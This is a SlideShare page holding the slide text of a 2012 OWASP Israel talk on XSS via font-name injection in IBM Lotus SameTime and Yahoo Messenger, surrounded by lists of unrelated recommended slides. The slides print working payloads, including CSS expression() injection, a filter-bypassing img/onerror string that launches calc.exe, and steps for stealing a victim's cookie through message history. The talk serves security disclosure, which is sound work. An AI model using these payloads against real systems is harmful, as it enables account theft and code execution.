SlideShare ist ein Scribd-Unternehmen logo

Stylish XSS via Font Name Injection

Als PPTX, PDF herunterladen
Adi Cohen
Adi Cohen

Stylish XSS via Font Name Injection Presented by Adi Cohen at OWASP Israel 2012

Technologie
1 von 44
© 2012 IBM Corporation IBM Security Systems 1© 2012 IBM Corporation Stylish XSS via Font Name Injection
© 2012 IBM Corporation IBM Security Systems 2 Background - Instant Messengers
© 2012 IBM Corporation IBM Security Systems 3 Background - Instant Messengers <Text Style=" font-family:Segoe UI; font-weight:bold; font-style:italic; color:#008000; ">Hi!</Text>
© 2012 IBM Corporation IBM Security Systems 4 Background - Instant Messengers Every time I’ve seen this screen, I wondered “What if I could use some HTML here…”
© 2012 IBM Corporation IBM Security Systems 5 Background - Windows Fonts Windows accepts basically any character as part of the font name Font name length limited to ~30 chars
© 2012 IBM Corporation IBM Security Systems 6 IBM Lotus SameTime Messenger <span style="font-size:14pt;font-family:Segoe UI; font-weight:normal;font-style:normal;">You Do!</span>
© 2012 IBM Corporation IBM Security Systems 7 SameTime - Exploit - CSS Font Name: expression(alert(1));
© 2012 IBM Corporation IBM Security Systems 8 SameTime - Exploit - CSS Font Name: expression(alert(1)); Desired output: <span style= ";font-family:expression(alert(1));…"> Actual output: <span style="">
© 2012 IBM Corporation IBM Security Systems 9 SameTime - Exploit - New Attribute Font Name: "onclick="alert(1)" Desired output: <span style="font-size:9pt;font-family:“ onclick="alert(1)" ..."> Actual output: <span style="font-size:9pt;font-family:" onclick="">
© 2012 IBM Corporation IBM Security Systems 10 SameTime - Exploit ~50 Fonts Later
© 2012 IBM Corporation IBM Security Systems 11 SameTime - Exploit - Found Message sent: <span style=“…font-family: Message Received: <span style=“…font-family:
© 2012 IBM Corporation IBM Security Systems 12 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='> Message Received: <span style=“…font-family:
© 2012 IBM Corporation IBM Security Systems 13 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='> Message Received: <span style=“…font-family:e0”> <img x='>
© 2012 IBM Corporation IBM Security Systems 14 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS"> Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">
© 2012 IBM Corporation IBM Security Systems 15 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">
© 2012 IBM Corporation IBM Security Systems 16 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' </span> Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' </span>
© 2012 IBM Corporation IBM Security Systems 17 SameTime – Remote Code Execution <span style="font-size:14pt;font-family:e0"> <img x=';font-weight:normal;font-style:normal;">' src='x' onerror='location="c:windowssystem32calc.exe"'</span>
© 2012 IBM Corporation IBM Security Systems 18 Yahoo Messenger
© 2012 IBM Corporation IBM Security Systems 19 Yahoo Messenger – Message View Lots of Colors, but that’s about it…
© 2012 IBM Corporation IBM Security Systems 20 Yahoo Messenger - History View
© 2012 IBM Corporation IBM Security Systems 21 Yahoo Messenger - History View
© 2012 IBM Corporation IBM Security Systems 22 Yahoo Messenger - History View Finally, Yahoo's purple alert!
© 2012 IBM Corporation IBM Security Systems 23 Yahoo Messenger - The Payload <img src="x"onmouseover="alert(1)">
© 2012 IBM Corporation IBM Security Systems 24 Yahoo Messenger - Digging Deeper Wait, what? It's not local?!
© 2012 IBM Corporation IBM Security Systems 25 Yahoo Messenger - Digging Deeper Accessing this URL in Chrome, yields the same result.
© 2012 IBM Corporation IBM Security Systems 26 Yahoo Messenger - Digging Deeper That means I can read the cookie! And steal your account!
© 2012 IBM Corporation IBM Security Systems 27 Yahoo Messenger - Recap 1. Send the victim a message that contain malicious HTML snippet 2. Wait 3-4 hours for it to show up in the history 3. Convince the user to access his history or send him a direct link to it (after all, it not local) 4. Have the victim click the Instant Message from the drop-down box
© 2012 IBM Corporation IBM Security Systems 28 Yahoo Messenger - Introducing: Web Messenger! Finally I can see the results of my attacks in real time!
© 2012 IBM Corporation IBM Security Systems 29 Yahoo Messenger - Web Messenger During the tests, I noticed that a <Font> tag sent as part of the message text, is being rendered differently in the Web Messenger. • The message: <font face="xxx" size="20">33333</font> • Was rendered as: <font style="font-size:20pt" face="xxx“ id="yui_3_2_0_20_1330267588862427">33333</font>
© 2012 IBM Corporation IBM Security Systems 30 Yahoo Messenger - Exploiting CSS Add a new rule with an expression() call.
© 2012 IBM Corporation IBM Security Systems 31 Yahoo Messenger - Exploiting CSS Started With: <font face=ssss size="1&color:red">xxxx</font> To my surprise the response came back as I hoped <font style="font-size:1&amp;color:red" >xxxx</font>
© 2012 IBM Corporation IBM Security Systems 32 Yahoo Messenger - Exploiting CSS Next was the expression: <font face=sssss size="1&color:expression(alert(1))" >xxxx</font> And again, it seems like nothing is filtering this... <font style="font-size:1&amp;color:expression(alert(1))" >xxxx</font>
© 2012 IBM Corporation IBM Security Systems 33 Yahoo Messenger - Exploiting CSS Time to open Internet Explorer!
© 2012 IBM Corporation IBM Security Systems 34 Yahoo Web Messenger - IE Version
© 2012 IBM Corporation IBM Security Systems 35 Yahoo Web Messenger - IE Version The Rules (for IE): 1. The Size attribute must be surrounded by double-quotes (" ") 2. The size value must be followed by the "pt;" suffix <font size="15pt;"> <font style="font-size=15pt;">
© 2012 IBM Corporation IBM Security Systems 36 Yahoo Web Messenger - IE Version By tweaking the size value, a new Font-Family CSS rule could be injected. <font size="15pt;font-family:aaaa;"> <font style="font-size=15pt;font-family: aaaa;">
© 2012 IBM Corporation IBM Security Systems 37 Yahoo Web Messenger - IE Version With all that in mind, and ~30 <Font> tags later, came the following payload that bypass the CSS filtering <font size="15pt;font-family:expression(alert(1));">
© 2012 IBM Corporation IBM Security Systems 38 Yahoo Web Messenger - IE Version It should work correctly according to the rendered source in IE Developer Tools
© 2012 IBM Corporation IBM Security Systems 39 Yahoo Web Messenger - IE Version Yet somehow, no alert
© 2012 IBM Corporation IBM Security Systems 40 Yahoo Web Messenger - Uber Meta! After ~5 hours of more fiddling and long lonely IM chats with myself I finally found out what I was afraid of. Or in other words, The "No Expression For You" Meta Tag <meta http-equiv="X-UA-Compatible" content="IE=8"/>
© 2012 IBM Corporation IBM Security Systems 41 Yahoo Web Messenger - Going Old School Fired up my Windows XP VM and kicked out IE8
© 2012 IBM Corporation IBM Security Systems 42 Yahoo Web Messenger - Finally
© 2012 IBM Corporation IBM Security Systems 43 Yahoo Messenger - History Window
© 2012 IBM Corporation IBM Security Systems 44 Questions?

Empfohlen

Why java is important in programming language?
Why java is important in programming language?Why java is important in programming language?
Why java is important in programming language?NexSoftsys
 
Web Development with NodeJS
Web Development with NodeJSWeb Development with NodeJS
Web Development with NodeJSRiza Fahmi
 
React JS
React JSReact JS
React JSSoftware Infrastructure
 
React js
React jsReact js
React jsOswald Campesato
 
Postman
PostmanPostman
PostmanIgor Shubovych
 
Introduction Node.js
Introduction Node.jsIntroduction Node.js
Introduction Node.jsErik van Appeldoorn
 
Java 8 Date-Time API
Java 8 Date-Time APIJava 8 Date-Time API
Java 8 Date-Time APIAnindya Bandopadhyay
 
Practical Use of MongoDB for Node.js
Practical Use of MongoDB for Node.jsPractical Use of MongoDB for Node.js
Practical Use of MongoDB for Node.jsasync_io
 

Empfohlen

Why java is important in programming language?
Why java is important in programming language?Why java is important in programming language?
Why java is important in programming language?NexSoftsys
 
Web Development with NodeJS
Web Development with NodeJSWeb Development with NodeJS
Web Development with NodeJSRiza Fahmi
 
React JS
React JSReact JS
React JSSoftware Infrastructure
 
React js
React jsReact js
React jsOswald Campesato
 
Postman
PostmanPostman
PostmanIgor Shubovych
 
Introduction Node.js
Introduction Node.jsIntroduction Node.js
Introduction Node.jsErik van Appeldoorn
 
Java 8 Date-Time API
Java 8 Date-Time APIJava 8 Date-Time API
Java 8 Date-Time APIAnindya Bandopadhyay
 
Practical Use of MongoDB for Node.js
Practical Use of MongoDB for Node.jsPractical Use of MongoDB for Node.js
Practical Use of MongoDB for Node.jsasync_io
 
Introduction to node.js
Introduction to node.jsIntroduction to node.js
Introduction to node.jsDinesh U
 
API Virtualization: Mocking on Steroids
API Virtualization: Mocking on SteroidsAPI Virtualization: Mocking on Steroids
API Virtualization: Mocking on SteroidsSmartBear
 
Selenium
SeleniumSelenium
Seleniummdfkhan625
 
TypeScript for Java Developers
TypeScript for Java DevelopersTypeScript for Java Developers
TypeScript for Java DevelopersYakov Fain
 
Using the Splunk Java SDK
Using the Splunk Java SDKUsing the Splunk Java SDK
Using the Splunk Java SDKDamien Dallimore
 
Introduction to Node.js
Introduction to Node.jsIntroduction to Node.js
Introduction to Node.jsVikash Singh
 
Web assembly overview by Mikhail Sorokovsky
Web assembly overview by Mikhail SorokovskyWeb assembly overview by Mikhail Sorokovsky
Web assembly overview by Mikhail SorokovskyValeriia Maliarenko
 
React Architecture & Best Practices.pptx
React Architecture & Best Practices.pptxReact Architecture & Best Practices.pptx
React Architecture & Best Practices.pptxAleksandarKondov
 
How To be a Backend developer
How To be a Backend developer How To be a Backend developer
How To be a Backend developer Ramy Hakam
 
Introduction to NodeJS
Introduction to NodeJSIntroduction to NodeJS
Introduction to NodeJSCere Labs Pvt. Ltd
 
BDD in Action – principles, practices and real-world application
BDD in Action – principles, practices and real-world applicationBDD in Action – principles, practices and real-world application
BDD in Action – principles, practices and real-world applicationJohn Ferguson Smart Limited
 
SOLID Principles
SOLID PrinciplesSOLID Principles
SOLID Principlesakbarashaikh
 
NestJS
NestJSNestJS
NestJSWilson Su
 
Introduction to Node js
Introduction to Node jsIntroduction to Node js
Introduction to Node jsAkshay Mathur
 
React workshop presentation
React workshop presentationReact workshop presentation
React workshop presentationBojan Golubović
 
Introduction to ReactJS
Introduction to ReactJSIntroduction to ReactJS
Introduction to ReactJSHoang Long
 
android sqlite
android sqliteandroid sqlite
android sqliteDeepa Rani
 
Introduction to Node JS.pdf
Introduction to Node JS.pdfIntroduction to Node JS.pdf
Introduction to Node JS.pdfBareen Shaikh
 
Nestjs MasterClass Slides
Nestjs MasterClass SlidesNestjs MasterClass Slides
Nestjs MasterClass SlidesNir Kaufman
 
Rest api with node js and express
Rest api with node js and expressRest api with node js and express
Rest api with node js and expressGirlsInTechnology Nepal
 
Expedited Removal Article_NM
Expedited Removal Article_NMExpedited Removal Article_NM
Expedited Removal Article_NMNicholas Merlin
 
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayuPeluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayuMiz Jaye
 

Weitere ähnliche Inhalte

Was ist angesagt?

Introduction to node.js
Introduction to node.jsIntroduction to node.js
Introduction to node.jsDinesh U
 
API Virtualization: Mocking on Steroids
API Virtualization: Mocking on SteroidsAPI Virtualization: Mocking on Steroids
API Virtualization: Mocking on SteroidsSmartBear
 
TypeScript for Java Developers
TypeScript for Java DevelopersTypeScript for Java Developers
TypeScript for Java DevelopersYakov Fain
 
Introduction to Node.js
Introduction to Node.jsIntroduction to Node.js
Introduction to Node.jsVikash Singh
 
Web assembly overview by Mikhail Sorokovsky
Web assembly overview by Mikhail SorokovskyWeb assembly overview by Mikhail Sorokovsky
Web assembly overview by Mikhail SorokovskyValeriia Maliarenko
 
React Architecture & Best Practices.pptx
React Architecture & Best Practices.pptxReact Architecture & Best Practices.pptx
React Architecture & Best Practices.pptxAleksandarKondov
 
How To be a Backend developer
How To be a Backend developer How To be a Backend developer
How To be a Backend developer Ramy Hakam
 
BDD in Action – principles, practices and real-world application
BDD in Action – principles, practices and real-world applicationBDD in Action – principles, practices and real-world application
BDD in Action – principles, practices and real-world applicationJohn Ferguson Smart Limited
 
Introduction to Node js
Introduction to Node jsIntroduction to Node js
Introduction to Node jsAkshay Mathur
 
React workshop presentation
React workshop presentationReact workshop presentation
React workshop presentationBojan Golubović
 
Introduction to ReactJS
Introduction to ReactJSIntroduction to ReactJS
Introduction to ReactJSHoang Long
 
android sqlite
android sqliteandroid sqlite
android sqliteDeepa Rani
 
Introduction to Node JS.pdf
Introduction to Node JS.pdfIntroduction to Node JS.pdf
Introduction to Node JS.pdfBareen Shaikh
 
Nestjs MasterClass Slides
Nestjs MasterClass SlidesNestjs MasterClass Slides
Nestjs MasterClass SlidesNir Kaufman
 

Was ist angesagt? (20)

Introduction to node.js
Introduction to node.jsIntroduction to node.js
Introduction to node.js
 
API Virtualization: Mocking on Steroids
API Virtualization: Mocking on SteroidsAPI Virtualization: Mocking on Steroids
API Virtualization: Mocking on Steroids
 
Selenium
SeleniumSelenium
Selenium
 
TypeScript for Java Developers
TypeScript for Java DevelopersTypeScript for Java Developers
TypeScript for Java Developers
 
Using the Splunk Java SDK
Using the Splunk Java SDKUsing the Splunk Java SDK
Using the Splunk Java SDK
 
Introduction to Node.js
Introduction to Node.jsIntroduction to Node.js
Introduction to Node.js
 
Web assembly overview by Mikhail Sorokovsky
Web assembly overview by Mikhail SorokovskyWeb assembly overview by Mikhail Sorokovsky
Web assembly overview by Mikhail Sorokovsky
 
React Architecture & Best Practices.pptx
React Architecture & Best Practices.pptxReact Architecture & Best Practices.pptx
React Architecture & Best Practices.pptx
 
How To be a Backend developer
How To be a Backend developer How To be a Backend developer
How To be a Backend developer
 
Introduction to NodeJS
Introduction to NodeJSIntroduction to NodeJS
Introduction to NodeJS
 
BDD in Action – principles, practices and real-world application
BDD in Action – principles, practices and real-world applicationBDD in Action – principles, practices and real-world application
BDD in Action – principles, practices and real-world application
 
SOLID Principles
SOLID PrinciplesSOLID Principles
SOLID Principles
 
NestJS
NestJSNestJS
NestJS
 
Introduction to Node js
Introduction to Node jsIntroduction to Node js
Introduction to Node js
 
React workshop presentation
React workshop presentationReact workshop presentation
React workshop presentation
 
Introduction to ReactJS
Introduction to ReactJSIntroduction to ReactJS
Introduction to ReactJS
 
android sqlite
android sqliteandroid sqlite
android sqlite
 
Introduction to Node JS.pdf
Introduction to Node JS.pdfIntroduction to Node JS.pdf
Introduction to Node JS.pdf
 
Nestjs MasterClass Slides
Nestjs MasterClass SlidesNestjs MasterClass Slides
Nestjs MasterClass Slides
 
Rest api with node js and express
Rest api with node js and expressRest api with node js and express
Rest api with node js and express
 

Andere mochten auch

Expedited Removal Article_NM
Expedited Removal Article_NMExpedited Removal Article_NM
Expedited Removal Article_NMNicholas Merlin
 
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayuPeluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayuMiz Jaye
 
rbusinessreport
rbusinessreportrbusinessreport
rbusinessreportmirajuwita
 
Untitled Presentation
Untitled PresentationUntitled Presentation
Untitled Presentationbnoon14700
 
حب الوطن من الايمان
حب الوطن من الايمانحب الوطن من الايمان
حب الوطن من الايمانbnoon14700
 
Syarikat multinasional
Syarikat multinasionalSyarikat multinasional
Syarikat multinasionalMiz Jaye
 

Andere mochten auch (13)

Expedited Removal Article_NM
Expedited Removal Article_NMExpedited Removal Article_NM
Expedited Removal Article_NM
 
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayuPeluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
 
BICSI NEC ARTICLE
BICSI NEC ARTICLEBICSI NEC ARTICLE
BICSI NEC ARTICLE
 
hjm
hjmhjm
hjm
 
rbusinessreport
rbusinessreportrbusinessreport
rbusinessreport
 
SECURITY SYSTEM INTEGRATION
SECURITY SYSTEM INTEGRATIONSECURITY SYSTEM INTEGRATION
SECURITY SYSTEM INTEGRATION
 
NewMetricsforCCTV_edited
NewMetricsforCCTV_editedNewMetricsforCCTV_edited
NewMetricsforCCTV_edited
 
CIRCLES OF COVERAGE FOR TELECOM ROOMS
CIRCLES OF COVERAGE FOR TELECOM ROOMSCIRCLES OF COVERAGE FOR TELECOM ROOMS
CIRCLES OF COVERAGE FOR TELECOM ROOMS
 
Untitled Presentation
Untitled PresentationUntitled Presentation
Untitled Presentation
 
AV system and lighting controls integration
AV system and lighting controls integrationAV system and lighting controls integration
AV system and lighting controls integration
 
حب الوطن من الايمان
حب الوطن من الايمانحب الوطن من الايمان
حب الوطن من الايمان
 
Syarikat multinasional
Syarikat multinasionalSyarikat multinasional
Syarikat multinasional
 
Ensayo
Ensayo Ensayo
Ensayo
 

Ähnlich wie Stylish XSS via Font Name Injection

Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
 
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfdistortdistort
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
 
eXploitable Markup Language
eXploitable Markup LanguageeXploitable Markup Language
eXploitable Markup Languagesghctoma
 
Google chrome sandbox
Google chrome sandboxGoogle chrome sandbox
Google chrome sandboxNephi Johnson
 
Securing your web applications in CF 2016
Securing your web applications in CF 2016Securing your web applications in CF 2016
Securing your web applications in CF 2016Pavan Kumar
 
Building high performing web pages
Building high performing web pagesBuilding high performing web pages
Building high performing web pagesNilesh Bafna
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningCA API Management
 
Malware analysis
Malware analysisMalware analysis
Malware analysisDen Iir
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdfssuser01066a
 
What's new in Xamarin.Forms?
What's new in Xamarin.Forms?What's new in Xamarin.Forms?
What's new in Xamarin.Forms?James Montemagno
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientAngelo Dell'Aera
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeAman Kohli
 
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...OW2
 
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...Carl Tyler
 
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0Haytham Ghandour
 

Ähnlich wie Stylish XSS via Font Name Injection (20)

Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdf
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
Usb hack
Usb hackUsb hack
Usb hack
 
eXploitable Markup Language
eXploitable Markup LanguageeXploitable Markup Language
eXploitable Markup Language
 
Google chrome sandbox
Google chrome sandboxGoogle chrome sandbox
Google chrome sandbox
 
Securing your web applications in CF 2016
Securing your web applications in CF 2016Securing your web applications in CF 2016
Securing your web applications in CF 2016
 
Building high performing web pages
Building high performing web pagesBuilding high performing web pages
Building high performing web pages
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And Hardening
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
 
What's new in Xamarin.Forms?
What's new in Xamarin.Forms?What's new in Xamarin.Forms?
What's new in Xamarin.Forms?
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
 
Hacking_PPT
Hacking_PPT Hacking_PPT
Hacking_PPT
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on Purpose
 
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
 
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
 
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
 

Kürzlich hochgeladen

Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 

Kürzlich hochgeladen (20)

Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
